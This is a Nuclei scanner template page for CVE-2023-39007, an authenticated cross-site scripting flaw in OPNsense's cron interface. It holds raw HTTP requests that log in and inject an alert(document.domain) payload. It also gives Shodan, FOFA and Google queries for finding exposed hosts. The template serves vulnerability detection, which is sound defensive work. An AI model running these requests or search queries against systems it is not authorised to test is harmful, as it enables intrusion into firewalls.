Skip to content
Nuclei Templates

OPNsense - Cross-Site Scripting to RCE

ID: CVE-2023-39007

Severity: critical

Author: ritikchaddha

Tags: cve2023,cve,opnsense,xss,authenticated,rce

Description

Section titled “Description”

There is a XSS in /ui/cron/item/open in the Cron component of OPNsense Community Edition before 23.7 and Business Edition before 23.4.2 via openAction in app/controllers/OPNsense/Cron/ItemController.php.

YAML Source

Section titled “YAML Source”
id: CVE-2023-39007


info:
  name: OPNsense - Cross-Site Scripting to RCE
  author: ritikchaddha
  severity: critical
  description: |
    There is a XSS in /ui/cron/item/open in the Cron component of OPNsense Community Edition before 23.7 and Business Edition before 23.4.2 via openAction in app/controllers/OPNsense/Cron/ItemController.php.
  reference:
    - https://logicaltrust.net/blog/2023/08/opnsense.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39007
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2023-39007
    cwe-id: CWE-79
    cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: opnsense
    product: opnsense
    shodan-query:
      - title:"OPNsense"
      - http.title:"opnsense"
    fofa-query: title="opnsense"
    google-query: intitle:"opnsense"
  tags: cve2023,cve,opnsense,xss,authenticated,rce


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        {{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1


      - |
        GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "openDialog('0'+alert(document.domain)+''"


      - type: word
        part: header_3
        words:
          - "text/html"


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: para
        part: body
        group: 1
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true


      - type: regex
        name: value
        part: body
        group: 2
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true
# digest: 4a0a0047304502210095f9a928f7c4e718295e91594ca02b7d0d7a802dc3a12596c17c31a4641bac360220294dce6193711408f44cb8d2b68278b0de57d099bfec2b5164eea2956efd6a78:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39007.yaml"

View on Github